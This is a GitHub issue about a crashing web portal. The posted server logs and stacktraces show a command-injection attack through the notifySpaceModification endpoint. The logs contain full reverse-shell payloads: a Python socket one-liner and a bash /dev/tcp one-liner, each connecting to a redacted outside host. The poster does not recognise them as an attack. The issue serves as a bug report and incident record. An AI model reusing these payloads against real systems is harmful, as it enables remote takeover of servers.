Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Some weird feature in portal make portal crash #1207

Closed
grimpy opened this issue Jan 16, 2018 · 1 comment
Closed

Some weird feature in portal make portal crash #1207

grimpy opened this issue Jan 16, 2018 · 1 comment
Assignees
Milestone

Comments

@grimpy
Copy link
Contributor

grimpy commented Jan 16, 2018

Detailed description

Try to figure out what procued undeneath stacktrace

Steps to reproduce

?

Relevant stacktraces

path:restmachine/system/contentmanager/checkEvents
path:restmachine/system/contentmanager/notifySpaceModification
execute cd /opt/code/;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("a.b.c.d",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';/dsa;hg pull;hg update -C

[1]+  Stopped                 jspython portal_start.py main
root@ovcmaster:/opt/jumpscale7/apps/portals/main#
@grimpy
Copy link
Contributor Author

grimpy commented Jan 17, 2018

path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 01:08:31] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 51.160594
127.0.0.1 - - [2018-01-17 01:08:35] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 51.397971
path:restmachine/system/contentmanager/notifySpaceModification
execute cd /opt/code/;bash -i >& /dev/tcp/a.b.c.d/4455 0>&1;/dsa;hg pull;hg update -C
***ERROR***:Traceback (most recent call last):
~   File "/opt/jumpscale7/lib/JumpScale/portal/portal/PortalRest.py", line 254, in execute_rest_call
    result = method(ctx=ctx, **ctx.params)
~   File "/opt/jumpscale7/apps/portals/portalbase/system/system__contentmanager/methodclass/system_contentmanager.py", line 315, in notifySpaceModification
    j.system.process.execute(cmd)
~   File "/opt/jumpscale7/lib/JumpScale/core/system/process.py", line 1419, in execute
    raise RuntimeError("Error during execution! (system.process.execute())\n\nCommand: [%s]\n\nExitcode: %s\n\nProgram output:\n%s\n\nErrormessage:\n%s\n" % (command, exitcode, output, error))
~ RuntimeError: Error during execution! (system.process.execute())
Command: [cd /opt/code/;bash -i >& /dev/tcp/a.b.c.d/4455 0>&1;/dsa;hg pull;hg update -C]
Exitcode: 2
Program output:
***ERROR***
/bin/sh: 1: Syntax error: Bad fd number
Errormessage:
/bin/sh: 1: Syntax error: Bad fd number
type/level: UNKNOWN/1
RuntimeError: Error during execution! (system.process.execute())
Command: [cd /opt/code/;bash -i >& /dev/tcp/a.b.c.d/4455 0>&1;/dsa;hg pull;hg update -C]
Exitcode: 2
Program output:
***ERROR***
/bin/sh: 1: Syntax error: Bad fd number
Errormessage:
/bin/sh: 1: Syntax error: Bad fd number
Execute method POST_system_contentmanager_notifySpaceModification failed.
method was:/restmachine/system/contentmanager/notifySpaceModification
 : method /restmachine/system/contentmanager/notifySpaceModification from ip 127.0.0.1 with params
127.0.0.1 - - [2018-01-17 07:17:01] "POST /restmachine/system/contentmanager/notifySpaceModification HTTP/1.0" 500 278 0.280855
path:restmachine/system/contentmanager/notifySpaceModification
execute cd /opt/code/;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ab.c.d",4455));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';/dsa;hg pull;hg update -C
path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 07:20:25] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 50.679114
path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 07:21:16] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 50.143170
path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 07:22:07] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 50.031289
path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 07:22:58] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 50.732053
path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 07:23:49] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 50.035244
path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 07:24:41] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 50.290057
path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 07:25:32] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 50.132486
path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 07:26:24] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 51.027070
path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 07:27:15] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 50.416290
path:restmachine/system/contentmanager/checkEvents
127.0.0.1 - - [2018-01-17 07:28:07] "GET /restmachine/system/contentmanager/checkEvents?cursor=944 HTTP/1.0" 200 154 51.305335
path:restmachine/system/contentmanager/notifySpaceModification
execute cd /opt/code/;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("a.b.c.d",4455));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';/dsa;hg pull;hg update -C

[1]+  Stopped                 jspython portal_start.py main
root@ovcmaster:/opt/jumpscale7/apps/portals/main# 
[jumpscale 0:redis_system  1:influxdb__main  2:mongodb_main  3:grafana_main  4:osis_eve_main  5:agentcontroller_main  6:portal_main* 7:nginx__main  8:jsagent_main-                                                                     "root@ovcmaster

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

4 participants